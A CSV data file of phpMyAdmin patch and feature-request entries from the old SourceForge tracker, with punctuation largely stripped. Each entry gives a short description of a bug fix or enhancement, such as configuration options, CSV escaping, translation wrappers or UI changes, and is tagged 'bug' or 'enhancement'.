"24444","4637","pmadb on different Mysql server.
The feature of linked references is a very nice feature, though in productive commercial installations of mySQL other than webhosting) it is very unusual to store tool configuration among the real transactional data.
That s thy I couldn t use that for a long time.
To set up a different database server, localhost or on a development machine, would be easy.
phpMyAdmin pmadb doesn t allow a different database server in current version 3.4.7).
The pmadb Connection is already separated from the data connection, so it was really easy to set an additional config param in libraries common.inc.php.
To use it, one has only to set a config param controlhost in config.inc.php corresponding to controluser and controlpass cfg[ Servers ][ i][ controlhost ] = struct.develop.ourteam.de ; Original URL https sourceforge.net p phpmyadmin patches 687 Original author mgergele","enhancement"
"24444","4638","inline edit on multiserver configuration .
if you configured more than one server an use inline edit you got an error 1046 database not selected).
i think the problem is only that the servernumber was not send within the ajax request.
for testing i inserter an server window.parent.server before every db window.parent.db in the sql.js.
this fixed this issue for me.
Original URL https sourceforge.net p phpmyadmin patches 688 Original author coupling","bug"
"24444","4639","Handle conflicts in some open basedir situations.
In some virtualhost case when default tmp directory is the same whene phpMyAdmin will move the uploaded file, then PHP will remove uploaded file bevcause the file names are the same.
When customer open basedir set and temporaray directory point to data org example mysql tmp then PHP will upload files there, phpMyadmin run from data org example mysql directory.
tmp subdir = PMA IS WINDOWS ?
.\\tmp\\ .
tmp ); if is writable tmp subdir)) \{ import file new = tmp subdir .
basename import file); Which is wrong because file names and file paths are the same, so a little fix will help on it to prevent PHP to delete uploded file after script finished.
import file new = tmp subdir .
basename import file).uniqid ); Original URL https sourceforge.net p phpmyadmin patches 689 Original author scr34m sf","bug"
"24444","4640","Add useful intermediate pages to pageselector.
Add page numbers with geometrically increasing distances.
This helps me a lot when navigating through giant tables.
Example case table with 2.28 million sets, 76190 pages.
Existing code offers page 72376 produced by percetage increment Page of interest is somewhere between 72376 and 76190.
Now, this code puts additional pages numbers current page 2,4,8,16,32, all powers of 2 giving valid page numbers) into the list, helping to navigate the gap between 72376 and 76190.
Original URL https sourceforge.net p phpmyadmin patches 690 Original author lettoz","enhancement"
"24444","4641","Make location of php gettext configurable.
Patch which makes the php gettext library that is used configurable, which is helpful or even required for some vendors or downstreams.
The default is the internal library to keep backward compatibility.
Main reason is, that the Fedora Project does not allow bundled libraries and thus I m now unbundling php gettext into a separate package at downstream.
Original URL https sourceforge.net p phpmyadmin patches 691 Original author robert scheck","bug"
"24444","4642","Notice Array to string conversion 5.4.0RC2 dev.
! )
Notice Array to string conversion in usr share phpMyAdmin libraries Error.class.php on line 180 \{main\} ) .. index.php 0 require once usr share phpMyAdmin libraries common.inc.php ) .. index.php 33 PMA Error Handler gt;handleError ) .. index.php 257 PMA Error gt;getHash ) .. Error Handler.class.php 122 The trivial patch attached serialize the back trace to allow string concatenation.
Could be apply to both 3.4.7.1 and master Original URL https sourceforge.net p phpmyadmin patches 692 Original author remicollet","bug"
"24444","4643","Add gettext wrappers.
This patch is to add gettext wrappers.
They still are not wrapped however they is added messages in 3.5.
Original URL https sourceforge.net p phpmyadmin patches 693 Original author rdeq08","bug"
"24444","4644","Fixed Translations do not work that contained external link.
It doesn t escape quote to translate by gettext in the Advisor, but it escapes quote to make po files.
Therefore, some advisor messages don t match originals in po files.
So, translations seem to not work that contained quotes eg.
external links) in the Advisor.
This patch adds escape for double quote to function translate Advisor.
Original URL https sourceforge.net p phpmyadmin patches 694 Original author rdeq08","bug"
"24444","4645","Fixed Overflow in a toggle switch of the Event.
A toggle switch of the Event is a little narrow.
So, in languages which breaks in one word, they overflow often.
It dosen t overflow when its width expands a little see my screenshot).
This probably depends on browser and font, I see it when using Firefox 8 and Meiryo font.
Original URL https sourceforge.net p phpmyadmin patches 696 Original author rdeq08","bug"
"24444","4646","Add gettext wrappers.
bytime words in the Advisor some labels on the query analyzer dialog in the Monitor Cancel request button on the load log statistics dialog in the Monitor These still are not wrapped gettext in 3.5.
Original URL https sourceforge.net p phpmyadmin patches 697 Original author rdeq08","bug"
"24444","4647","Improved escape in the Advisor.
It dosen t escape when bracket follows eg.
0.1 ) of Query cache low memory prunes rule).
This patch escapes when following round bracket and lt; , gt; for HTML tags in just case.
Original URL https sourceforge.net p phpmyadmin patches 699 Original author rdeq08","bug"
"24444","4648","Use label tags.
No label tag mean that is not used for attribute .
Label tags using for attribute click easily, especially radio and checkbox.
Original URL https sourceforge.net p phpmyadmin patches 700 Original author rdeq08","bug"
"24444","4649","Tracking icons when browsing database.
When browsing a database with tracking enabled on multiple tables, the tracking icons eye symbols) are not in line with eachother.
I suggest moving the icon into the Action column, before Browse, and have it washed out if not enabled this way all of the icons are lined up.
Original URL https sourceforge.net p phpmyadmin patches 701 Original author conquerthis","bug"
"24444","4650","Localize month header in calendar.
Month header in calendar is displayed in format MM yy only, that isn t localized.
There are options for L10n in Datepicker of jQuery, so this patch uses these.
Original URL https sourceforge.net p phpmyadmin patches 702 Original author rdeq08","bug"
"24444","4651","use regexp to filter tables in javascript fast filter.
text typed in the fast filter is used as a regexp to test tables name old behavior is about the same since you don t often have regexp specials chars in a table name git repo git evangeneer.net foss phpmyadmin Original URL https sourceforge.net p phpmyadmin patches 703 Original author anonymous","bug"
"24444","4652","Add missing percent.
In messages of the Advisor, there are missing percent for percentage.
Original URL https sourceforge.net p phpmyadmin patches 704 Original author rdeq08","bug"
"24444","4653","Improved the Structure table of the snapshot.
The Structure table directs mostly to show, therefore especially NULL, none and empty string are blank all.
This patch is to display like the Structure page.
There are some gettext in it, however they is the same defined on the Structure page in 3.4.
Original URL https sourceforge.net p phpmyadmin patches 705 Original author rdeq08","bug"
"24444","4654","Make sql editor font more bigger..
The new sql editor for phpmyadmin3.5 is great, but I feel the editor s font is too small and hard to see.
So I adjust the css file make the editor s font more bigger.
Original URL https sourceforge.net p phpmyadmin patches 706 Original author anonymous","bug"
"24444","4655","Add functionality to ignore characters in a query.. Not sure if this is the right category to put this in or not.
There are CMS s that like to wrap their tables in different characters to allow for code portability and prefixing tables.
One that falls into this is Drupal which wraps its table names in braces i.e.
\{users\}).
While developing code for Drupal, if you would like to check your query you can print it out to the screen, but you then need to manually remove the wrapping characters.
I would like to add functionality so you could add in a textfield by the Delimiter field) characters that could be ignored.
I ve tested this locally and haven t run into issues but would like to get others to test it as well.
There is also the option to set default characters in the config file by adding a line like cfg[ CharacterIgnore ] = \{\} ; The field shows up next to the Delimiter text field on the sql query form.
I m open to changing the lable for this field if anyone has suggestions.
Original URL https sourceforge.net p phpmyadmin patches 707 Original author aaronott","bug"
"24444","4656","Show units on the Monitor dialog.
Units is shown in the Chart of the Monior.
But it isn t shown in the Series in Chart on the Add chart dialog.
Original URL https sourceforge.net p phpmyadmin patches 708 Original author rdeq08","bug"
"24444","4657","Fixed CSV escape for the export.
For CSV export if Columns escaped with is set to , there are instead of in a result of data contained .
And that default value is different to mention in RFC 4180.
This problem happens when escape string equals enclose, not only Excel.
Original URL https sourceforge.net p phpmyadmin patches 709 Original author rdeq08","bug"
"24444","4658","Join messages.
These are separate, so it s difficult to translate for different word orders.
Original URL https sourceforge.net p phpmyadmin patches 710 Original author rdeq08","bug"
"24444","4659","Fixed CSV escape for the import.
When escape string is the same as enclose eg.
escape and enclose ) to metion in RFC 4180, it can t import CSV.
For example, set escape and enclose , and import from data a a , b ,c\c If that data is correct to be imported, the result is Column1 a a Column2 b Column3 c\c This patch is able to read data when escape string equals enclose.
And escape default value is fixed because it is different to mention in RFC 4180.
Original URL https sourceforge.net p phpmyadmin patches 711 Original author rdeq08","bug"
"24444","4660","Fast filters for database list.
As requested by rfe 3475138.
Original URL https sourceforge.net p phpmyadmin patches 712 Original author madhuracj","bug"
"24444","4661","Add gettext.
They exist all already in po file.
Change settings was not only used PMA messages.
unknown is a size of tables in the database structure.
eg.
It s found in database `mysql`.)
Change settings is the second subtitle on the Monitor Instrutions.
Cancel is a button on the Build Query dialog of the visual builder.
Original URL https sourceforge.net p phpmyadmin patches 714 Original author rdeq08","bug"
"24444","4662","Set auto increment column to 0.
Set auto increment column to 0 when selecting any of the insert options in the submit type dropdown.
Solution for feature req ID 3480477 https sourceforge.net tracker ?func=detail aid=3480477 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin patches 716 Original author ekitomat","bug"
"24444","4663","Activates codemirror for inline query edits.
Activates codemirror for inline query edits, adapts the height to the same as the replaced textarea.
Original URL https sourceforge.net p phpmyadmin patches 717 Original author ekitomat","bug"
"24444","4664","Add abbr tags in the Documentation.
FAQ, CSV, URL, SQL, IIS, most of thier words use addr tags, but some of them don t have the tags.
This patch adds the adds tags to the words.
Original URL https sourceforge.net p phpmyadmin patches 718 Original author rdeq08","bug"
"24444","4665","AJAX functions for zoom search page.
Used ajax to update field type, collation, operators and field values in the table zoom search input form.
Also committed my work on github repo https github.com ammaryasir phpmyadmin) Original URL https sourceforge.net p phpmyadmin patches 719 Original author ayax88","bug"
"24444","4666","don`t show all the fields in browse.
When the tables are big more than 30 fields) the display of all fields is too slow and unnecessary.
Display the 10 first fields and all under request.
Original URL https sourceforge.net p phpmyadmin feature requests 6 https sourceforge.net p phpmyadmin feature requests 6 Original author anonymous","enhancement"
"24444","4667","XML Import fix message and redirect.
I have searched on the trackers and did not find anything similar regarding this issue.
Short description Currently, on the demo server, if you export a database table in xml format, empty that database and import it back, sometimes the success message is shown as a PMA Message NOTICE in a div class= notice ), or no success message is shown at all.
In both cases, the import is completed, but the page is redirected to index with ?target=main.php, instead of printing the success message on the import page ?target=db import.php).
Cause This behaviour is caused by the fact that the database name is escaped with PMA backquote, called through several functions, and when the table is searched in the database, it is not found, so although the import succeeds, it is treated as database not found and redirected.
A little more details The problem starts with libraries import xml.php line 309 which calls PMA buildSQL ) with the db name argument.
In libraries import.lib.php lines 884 and 886 from PMA buildSQL ), sql[] is formed using PMA backquote db name).
sql[] is then passed as an argument to PMA importRunQuery line 899, which is retained in the import run buffer[ sql ] line 208.
On the next call of PMA importRunQuery ), the PMA lookForUse ) is used line 166, with import run buffer[ sql ] as the first argument.
There, preg match is used to get all the non spaces after USE in the buffer line 225, but next 2 rows db = trim match[1]); db = trim db, ; ); for example, USE abc; do not accomplish the job of getting the correct database name.
Solution In order to get the correct database name, I added a PMA removeBackquote a name) function, which does the exact opposite of PMA backquote a name, do it = true).
It unescapes backquotes from double backquotes to single backquotes) and removes backquotes on both sides of the unescaped database name.
I declared it with only one argument, because the second one do it is not used in this context, and this context is currently the only place this function is used.
As a side note, I ve noticed that PMA lookForUse ) receives 3 arguments, but the second one param string db current db is overwritten, so its value is never actually used.
Tests I have tested this patch on a database called `hg` ` ` 1` `` ` ` 232j3jh` ```` ` importing database data from .xml, .sql, .csv and .ods exported files.
The xml now correctly prints the success message on the import page, and the other import plugins` behaviour is not affected.
As another side note, the csv and csv excel import for databases do not keep the table names it replaces them with TABLE 1, and so on ).
I don t know if that is the correct behaviour or if it is documented anywhere.
I have attached the patch containing the diff, and you can also find a separate branch regarding this on my repo[0].
[0] https github.com alexukf phpmyadmin compare import xml fix message and redirect Alex Original URL https sourceforge.net p phpmyadmin patches 720 Original author alexukf","bug"
"24444","4668","GZIP of the DUMP.
Hi guys, I made a little improvement which can GZIP the DUMP sent to you.
Is there a possibility to add this improvement?
Original URL https sourceforge.net p phpmyadmin feature requests 8 https sourceforge.net p phpmyadmin feature requests 8 Original author tehac","enhancement"
"24444","4669","Contest 5 Add user Allow create DB w same name.
Updated Add user form to allow create DB with same name AND grant user , at once.
Original URL https sourceforge.net p phpmyadmin patches 722 Original author mynetx","bug"
"24444","4670","String Outsourcing in main.php3.
Move strings that are not outsourced in main.php3 to the language files.
Original URL https sourceforge.net p phpmyadmin feature requests 9 https sourceforge.net p phpmyadmin feature requests 9 Original author robbat2","enhancement"
"24444","4671","Contest 6 Export all privileges.
Regarding feature request 3490114 I have added an Export All link outside of the tableuserrights table.
It has similar behavior to the export links from each row of the mentioned table, except for the fact that the pop up window will now show all the privileges for all of the existing users.
I chose the position of the link to be on the same line with Check All Uncheck All, but I do not know if that is the most natural position it could fit in.
Alex Original URL https sourceforge.net p phpmyadmin patches 723 Original author alexukf","bug"
"24444","4672","Contest 4 Switch to textarea for CHAR data longer than 120.
Contest 4 Switch to textarea for CHAR data longer than 120 chars.
Original URL https sourceforge.net p phpmyadmin patches 724 Original author mynetx","bug"
"24444","4673","Detect MySQL features per version.
In many cases, with older versions of MySQL still quite prevalent out there, we should detect what versions those are and hide some of the features that only the new versions support, such as table types and full text searchs.
Original URL https sourceforge.net p phpmyadmin feature requests 12 https sourceforge.net p phpmyadmin feature requests 12 Original author robbat2","enhancement"
"24444","4674","Contest 1 Add option for ignoring foreign keys ID 3068559.
Regarding feature request 3068559 I added option of dropping multiple tables without checking for foreign keys.
And added corresponding case drop tbl without foreign check .
In this case, tables will be dropped after dropping foreign key relations related to them.
Original URL https sourceforge.net p phpmyadmin patches 725 Original author avsaro","enhancement"
"24444","4675","Fix checkbox behaviour while editing identical rows.
Fixes the issue mentioned in Bug id 3495483.
While changing deleting multiple identical row entries in a table, the interface now behaves correctly by handling all the selected rows.
Original URL https sourceforge.net p phpmyadmin patches 726 Original author atul5","bug"
"24444","4676","Change password buttons should match ID 3187077.
Feature Request ID 3187077 is implemented.
Original URL https sourceforge.net p phpmyadmin patches 727 Original author yasithacp","bug"
"24444","4677","Fixed the PMA selenium test cases Login).
Exist selenium test cases are not running.
Rewrite the PmaSeleniumTestCase.php and updated the PmaSeleniumLoginTest.php Original URL https sourceforge.net p phpmyadmin patches 728 Original author yasithacp","bug"
"24444","4678","Contest 2 Show index information in the data dict.. attached is the patch.
Original URL https sourceforge.net p phpmyadmin patches 729 Original author hiddenpearls","bug"
"24444","4679","Multiple DUMP.
It would be great when you DUMP the whole database but you want just a few of them and you are lazy to do id one by another ) to select amp;lt;SELECT amp;gt;) multiple tables to DUMP.
th Original URL https sourceforge.net p phpmyadmin feature requests 21 https sourceforge.net p phpmyadmin feature requests 21 Original author anonymous","enhancement"
"24444","4680","Contest 4 feature request ID 2046140.
Because of using lt;input type= text gt; for VARCHAR fields it s not able to insert or edit large values to these fields because the maximum lenght of the textfield values are limited by HTML and or the browsers.
It uses lt;textarea gt; for larger VARCHAR lt;255) in this patch.
Original URL https sourceforge.net p phpmyadmin patches 730 Original author thilinaa","bug"
"24444","4681","Display distinct results, linked to data rows.
The results coming from Brows Distinct Values in table structure, are linked to corresponding data row s).
Implementation regarding feature request ID 2998185 in sourceforge.
https sourceforge.net tracker index.php?func=detail aid=2998185 group id=23067 atid=377411 Original URL https sourceforge.net p phpmyadmin patches 731 Original author chanaka777","bug"
"24444","4682","password change for single users ?.
Idea taken from http www.phpwizard.net phorum read.php?f=1 amp;amp;i=3593 amp;amp;t=3593 Maybe we could add a simple way for an user to change his own password ?
Not sure if it would require write access to the mysql admin db maybe there is another way to do that ?
If not, please simply cancel this request ) Original URL https sourceforge.net p phpmyadmin feature requests 30 https sourceforge.net p phpmyadmin feature requests 30 Original author swix","enhancement"
"24444","4683","Authentication relogin with same user.
In advanced auth, after a logout, I can t login with the same user.
If I change user it works.
This happens in Netscape 4.7 and IE 5.0.
Original URL https sourceforge.net p phpmyadmin feature requests 31 https sourceforge.net p phpmyadmin feature requests 31 Original author lem9","enhancement"
"24444","4684","Refactored the Create Table ajax options.
This patch contains some refactorings of the Create Table ajax code.
The changes contain with the navigation.js and the functions.js files.
Original URL https sourceforge.net p phpmyadmin patches 732 Original author lgtkaushalya","bug"
"24444","4685","Removed result query duplication in table structure.
The following criteria gives a result query duplication.
1\.
Go to a database and select a table which do not have data.
It will direct you to the structure tab.
You can see the the result query as SELECT ...... 2\.
Then click on the Change option in the column.
It will pop up the dialog to edit the table.
3\.
Click on Save and it will show the ALTER TABLE .... result query on the structure page.
4\.
But still the old SELECT ... result query is display and it s display under the table columns.
This fix remove this extra result query.
Since this is a noticeable issue I did a quick fix.
This whole functionality need a full refacotring and I ll will do it soon.
Original URL https sourceforge.net p phpmyadmin patches 733 Original author lgtkaushalya","bug"
"24444","4686","Contest 3 Option Truncate table before Insert .
I have added a option called truncate table in `Data dump options` if choose , exported .SQL file will TRUNCATE TABLE before dump data .
my git branch https github.com surgesoft phpmyadmin and the network is bad tonight... sorry for duplicate submissions..
Original URL https sourceforge.net p phpmyadmin patches 734 Original author surgesoft","bug"
"24444","4687","Contest 1 Ignoring foreign keys while dropping table.
Added Foreign Key Check disabling option in the drop table confirmation form.
Original URL https sourceforge.net p phpmyadmin patches 735 Original author atul5","bug"
"24444","4688","structure schema printed multiple times in Word export.
Table structure is getting printed twice in the output file incase of Microsoft word format.
Once before the data dump and one just after that.
Original URL https sourceforge.net p phpmyadmin patches 736 Original author selvam1991","bug"
"24444","4689","Fix Bugs 3509665 session expire.
edit a cell and press enter when session is expired will get a session expired warning Original URL https sourceforge.net p phpmyadmin patches 737 Original author surgesoft","bug"
"24444","4690","PrivilegesTest and XssTest are fixed.
Fixed the PmaSeleniumPrivilegesTest and add testQueryTabWithNullValue method to PmaSeleniumXssTest class.
Original URL https sourceforge.net p phpmyadmin patches 738 Original author yasithacp","bug"
"24444","4691","no dhtml for only db.
when only db is set in the config for a database, dhtml shouldn t be used, makes no sense, since there is only one database to operate on.
all tables should be displayed, the tree display could be abandonded.
Original URL https sourceforge.net p phpmyadmin feature requests 40 https sourceforge.net p phpmyadmin feature requests 40 Original author temporary","enhancement"
"24444","4692","wecan either use the static method in the code in order to i. we can either use the static method in the code in order to improve theefficiency.
another point I would like to ask what if we use the complete pathname with require and include, it will be much faster.
Original URL https sourceforge.net p phpmyadmin patches 739 Original author nandu130","bug"
"24444","4693","Table list tool tip.
Fix to bug id 3512565 Every element from the list of tables shown in the left frame, have a tooltip that shows the number of rows i.e.
Structure 20 Rows) , Browse 20 Rows) , etc).
After clicking one of these items, tip is missing the word Rows from the Tooltip.
Original URL https sourceforge.net p phpmyadmin patches 740 Original author chanaka777","bug"
"24444","4694","Refactoring for user password.php file.
I have done some code refactoring for user password.php file.
not for the whole script, some part has been done refactoring.
Original URL https sourceforge.net p phpmyadmin patches 741 Original author thilinaa","bug"
"24444","4695","refactoring example.
I made this patch for showing an example patch for my GSoC proposal.
It is refactor user password.php.
Original URL https sourceforge.net p phpmyadmin patches 742 Original author avsaro","bug"
"24444","4696","Reserved words such as ORDER or GROUP.
When I tried to create a table named order full of orders to process, I received no error.
phpMyAdmin processed the command without error.
It took me quite awhile to realize that I was using a reserved word.
Later, the same thing happened when I tried to create a table named group .
No error, but whenever I tried to create that field, nothing happened.
Can phpMyAdmin post an error message back, saying amp;quot;sorry, you can t create a field named order because shortly, you re going to want to order your fields, and you can t order order!
amp;quot; Something like that.
Original URL https sourceforge.net p phpmyadmin feature requests 50 https sourceforge.net p phpmyadmin feature requests 50 Original author anonymous","enhancement"
"24444","4697","New feature autocomplete in querywindow.php.
This feature is closely related to my GSoC proposal [1].
[1] https google melange.appspot.com gsoc proposal review google gsoc2012 jrluiscarlos 1 Original URL https sourceforge.net p phpmyadmin patches 743 Original author jrluiscarlos","bug"
"24444","4698","Fix bug 3415061 login screen appear under the page.
Fixed the problem of login screen appearing under the page after session expire in a newly opened SQL tab.
Probably the fix is one of the easiest ways to fix this bug and proper solutions might include checking for JSON non JSON AJAX response, but I think the fix may suffice at the moment.
Original URL https sourceforge.net p phpmyadmin patches 744 Original author atul5","bug"
"24444","4699","Group databases with the same structure.
Most developers have several databases with the same structure, f.e.
one on the development server one on the production server.
Unfortunately they have to tune phpMyAdmin for every DB separately.
It s very annoying because databases are often complex their tuning in PMA takes a lot of time.
The idea is to support database groups , with DBs processed by PMA in the same way.
For example, if I have databases `db test` `db work`, I write to config.inc.php cfg[ Servers ][ i][ pmadb groups ][ db work ] = db test ; .. and `pmadb` settings for both databases are stored in one place with db test database name.
In particular this works if `db test` `db work` are on different servers `db work` is managed on development machine through SSH.
If 3 tables have the same structure, config would be like cfg[ Servers ][ i][ pmadb groups ][ db work 1 ] = db test ; cfg[ Servers ][ i][ pmadb groups ][ db work 2 ] = db test ; .., etc.
I add the patch for phpMyAdmin 3.5.0, saved by Tortoise SVN.
All works fine.
Original URL https sourceforge.net p phpmyadmin patches 746 Original author arcadius radius","enhancement"
"24444","4700","Focus SQL field after inserting column name into it.
It would be convenient to focus SQL textarea after inserting column name into it by double clicking lt;select gt; at the right or by pressing lt; lt; button).
Original URL https sourceforge.net p phpmyadmin patches 747 Original author arcadius radius","bug"
"24444","4701","Same message as PMA Types MySQL.
These messages are the same, but different only quotes.
Original URL https sourceforge.net p phpmyadmin patches 748 Original author rdeq08","bug"
"24444","4702","Browsing Triggers and Procedures.
Added the new links to Browse for Triggers and Procedure in the PHPMYADMIN Rather than typing the Query.
Changed the Files sql.php header.inc Original URL https sourceforge.net p phpmyadmin patches 749 Original author gumptech","bug"
"24444","4703","Aggregate functions dropdown Introduced.
Aggregate functions dropdown introduced.
User can select a function and its prototype will be dropped into the query box.
Change 1 New function insertFunctionQuery added on line 114 of js functions.js Change 2 Drop down control added for aggregate function on line 259 of libraries sql query form.lib.php Original URL https sourceforge.net p phpmyadmin patches 750 Original author gumptech","bug"
"24444","4704","best index surliner.
in tbl properties.
line of amp;lt;table amp;gt; where the fields are PRIMARY, INDEX OR UNIQUE Can have an configurable Color.
Or changing border or Font changing.
Original URL https sourceforge.net p phpmyadmin feature requests 57 https sourceforge.net p phpmyadmin feature requests 57 Original author moosh fr","enhancement"
"24444","4705","Query results.
Right now, if you run a query and not just a browse), it does not return the total results...it only shows you 0 to 30 and then the navigation buttons appear depending on whether there are more than 30 results.
The reason for this is in lib.inc.php in the dispaly table function.
This is how it should be.... if !
is simple amp;amp; amp;amp;!empty db)) \{ result = mysql query sql query); total = mysql num rows result); \} end if whereas before it only ran the query for a browse by just counting all the rows in the table...in fact, what needs to happen is the query needs to be run again without LIMIT 30,0 to get the total number of rows...it should be quite fast and maybe this can be a configuration option to always calculate the total results returned...This way, you can add a amp;quot;Show All amp;quot; button that will break out of the LIMIT, useful when you want to get all the rows from a search repeatedly... Dan Allen Original URL https sourceforge.net p phpmyadmin feature requests 58 https sourceforge.net p phpmyadmin feature requests 58 Original author lem9","enhancement"
"24444","4706","Authentication don t give stduser access to encrypted passw.
The MySQL docs here http www.mysql.com documentation mysql bychapter manu al Privilege system.html warn extensively about giving accounts access to the MySQL USER table.
A few examples amp;quot;DON T EVER GIVE ANYONE EXCEPT THE MySQL ROOT USER) ACCESS TO THE user TABLE IN THE MySQL DATABASE!
The encrypted password is the real password in MySQL.
If you know the password listed in the user table for a given user, you can easily log in as that user if you have access to the host listed for that account.
amp;quot; and amp;quot;Note that even if the password is stored scrambled , and knowing your scrambled password is enough to be able to connect to the MySQL server!
amp;quot; and amp;quot;Never give a normal user access to the mysql.user table.
Knowing the encrypted password for a user makes it possible to login as this user.
amp;quot; This of course means the way that phpMyAdmin uses the stduser account is bad...
I tried getting around this by only granting stduser access to specific columns in the USER table, but then MySQL complains when line 268 of lib.inc.php tries to validate users manually by looking up usernames and passwords in the USER table.
Wouldn t it be better to let MySQL do the validation by issuing a amp;quot;mysql connect amp;quot; command with the supplied credentials?
If that makes sense, then perhaps the docs could be updated to specify the exact columns that stduser needs access to in the user table in order to be really safe.
thanks, larry FYI I am running rc4 in Advanced Authentication mode) Original URL https sourceforge.net p phpmyadmin feature requests 59 https sourceforge.net p phpmyadmin feature requests 59 Original author ljm","enhancement"
"24444","4707","cannot start session without errors.
libraries session.inc.php, line 85 PMA fatalError Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
); \ PMA fatalError Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
); Works perfect and doesn t annoy me on clean installations since 2010.
Please note, that every other piece of php code is able to create sessions properly, except for phpmyadmin.
That sucks.
Original URL https sourceforge.net p phpmyadmin patches 751 Original author rootwerk","bug"
"24444","4708","ConfigGenerator.class.php generate faulty config.inc.php.
Example of problem the last comma is missing cfg[ PDFPageSizes ] = array A3 , A4 , A5 , letter legal ); To fix the problem phpMyAdmin 3.5.1 all languages setup lib ConfigGenerator.class.php line 144 lt; ret .= i lt; imax ?
i gt; 0 ?
, ) ) .
crlf .
.
retv[ i]; gt; ret .= i gt; 0 ?
, ) .
crlf .
.
retv[ i]; Original URL https sourceforge.net p phpmyadmin patches 752 Original author arcenik","bug"
"24444","4709","Updating table content in table view does not work.
1) Install phpMyAdmin 3.5.2 I did it on Win7 32bit using EasyPHP PHP 5.4.4 VC9 | Apache 2.4.2 VC9 | MySQL 5.5.25a | PhpMyAdmin 3.5.1 | Xdebug 2.2.0)) config.inc.php does not need to be present.
2) Create a table which has a primary key.
3) Add some table rows.
4) Switch to Browse view of table SELECT FROM `mytable` LIMIT 0 , 30 ) 5) Try to edit a value by clicking on it and pressing enter.
Result Nothing happens.
Edited field not saved.
Instead Firebug reports a is undefined return decodeURIComponent a.replace \ g, 20 )) in sql.js Chrome says Uncaught TypeError Cannot call method replace of undefined Problem seems to be that the layout HTML) changed, while JS still search for old ids and classes.
I attached fixed versions of the two concerned files.
Original URL https sourceforge.net p phpmyadmin patches 753 Original author notdifficult","bug"
"24444","4710","Add option to hide specific tabs on homepage.
Hi, this patch allows user to hide specific tabs from homepage.
Link to old feature request https sourceforge.net projects phpmyadmin forums forum 72909 topic 3434717 Original URL https sourceforge.net p phpmyadmin patches 755 Original author tomassrnka","enhancement"
"24444","4711","quot;Explain query quot; button.
MySQL has this great new feature, explain, that tells roughly how heavy a select query is for the server.
It would be nice to have this integrated to phpMyAdmin somehow, maybe by adding an amp;quot;Explain query amp;quot; button to amp;quot;Run SQL query amp;quot; form and amp;quot;Select amp;quot; form.
Original URL https sourceforge.net p phpmyadmin feature requests 65 https sourceforge.net p phpmyadmin feature requests 65 Original author anonymous","enhancement"
"24444","4712","Add raw value as title on server status page.
On the server status page, I added the raw value as a title attribute on an abbr tag wrapped around the formatted value if it is over 1000, when it would get shortened with PMA fromatNumber ).
The output is the same as how the server variables page displays large values.
This makes it easier to notice small changes in large values without having to choose between only seeing either the formatted or unformatted values.
Original URL https sourceforge.net p phpmyadmin patches 756 Original author anonymous","bug"
"24444","4713","Comments for indexes.
This is a patch for the feature request at https sourceforge.net tracker ?func=detail aid=3599046 group id=23067 atid=377411 It adds the field to the create edit index dialog for comments and the little bit of code needed to actually insert the comment.
Original URL https sourceforge.net p phpmyadmin patches 757 Original author anonymous","enhancement"
"24444","4714","Display the logged in user.
From the forum Maybe it s a good idea to state the username of the currently connected user to the MySQL 3.23.38 nt running on localhost line in MAIN.PHP.
for example MySQL 3.23.38 nt running on localhost as rmartens 217.120.15.116 especially for adv auth users this can be essential information when applying strict security.
Many thanks, Regards, Richard Martens Original URL https sourceforge.net p phpmyadmin feature requests 67 https sourceforge.net p phpmyadmin feature requests 67 Original author lem9","enhancement"
"24444","4715","Table type in table creation changing.
During table creation, it should allow user to specify table type.
When modifying table structure, it should allow changing the table type as well Original URL https sourceforge.net p phpmyadmin feature requests 1 https sourceforge.net p phpmyadmin feature requests 1 Original author korakot","enhancement"
"24444","4716","CSS Skins.
Inplement skins with css.
Select the css file to use with a combo box in the home, then the fashion of the program will be easily costomisable and graphics designes can contributing with this regarding of programing.
Scuse my bad english Saludos Edu.
Original URL https sourceforge.net p phpmyadmin feature requests 68 https sourceforge.net p phpmyadmin feature requests 68 Original author ladron","enhancement"
"24444","4717","Advanced index creation.
Ability to create index on more than one field or for the first N character of the field.
Creation of full text index.
This should be a separate page.
Original URL https sourceforge.net p phpmyadmin feature requests 2 https sourceforge.net p phpmyadmin feature requests 2 Original author korakot","enhancement"
"24444","4718","INSERT in addition to UPDATE row.
There are many times when adding a new row is only minor modification from a previous row.
In this case phpmyadmin should add a new button INSERT) to the edit row page, to allow the newly edited data be added to table instead of updating existing row.
Original URL https sourceforge.net p phpmyadmin feature requests 3 https sourceforge.net p phpmyadmin feature requests 3 Original author korakot","enhancement"
"24444","4719","User Admin.
Ability to do some user administration if logged in as the root user.
Although it would probably be a lot of work.
Original URL https sourceforge.net p phpmyadmin feature requests 4 https sourceforge.net p phpmyadmin feature requests 4 Original author robbat2","enhancement"
"24444","4720","selecting data.
Can you make it so that when you select things from a table it can select data from anytime rather than just a certian ammount of days old.
Like just a simple select everything.
Like SELECT FROM table; Original URL https sourceforge.net p phpmyadmin feature requests 72 https sourceforge.net p phpmyadmin feature requests 72 Original author drake 295","enhancement"
"24444","4721","Maintainance Features on Properties Page.
Could you add repair, check, optimise and any other maintainance features to the main database pages.
Thanks Pete Kelly Original URL https sourceforge.net p phpmyadmin feature requests 5 https sourceforge.net p phpmyadmin feature requests 5 Original author trafficg","enhancement"
"24444","4722",".php package for PHP4 users.
I would like to have a .php release just as they used to have in PHPWizards.
I use PHP 4 extensivly and I really don t like to have to change the exension.
Original URL https sourceforge.net p phpmyadmin feature requests 7 https sourceforge.net p phpmyadmin feature requests 7 Original author baldusi","enhancement"
"24444","4723","Create Database Privilege.
Show create database only on create priv being set.
Original URL https sourceforge.net p phpmyadmin feature requests 10 https sourceforge.net p phpmyadmin feature requests 10 Original author robbat2","enhancement"
"24444","4724","?)
In place edit of fields.
In the browse page, the data in table field should be easily editable change from text to text box when clicked) and many rows be edited simultaneosly.
This should be possible if implemented in cross browser javascript DHTML).
Original URL https sourceforge.net p phpmyadmin feature requests 11 https sourceforge.net p phpmyadmin feature requests 11 Original author korakot","enhancement"
"24444","4725","Table edit Radio buttons for enums.
Armel Fauveau suggests to replace, in table edit mode, pull down menus by radio buttons, to improve the interface.
Original URL https sourceforge.net p phpmyadmin feature requests 13 https sourceforge.net p phpmyadmin feature requests 13 Original author lem9","enhancement"
"24444","4726","Edit page functions depend on type.
In the edit page, the function in the dropdown box should be limited to a few related to the data type of field.
For example, in set and enum, there should be no dropdown at all, and in the time type, it should only show functions related to time.
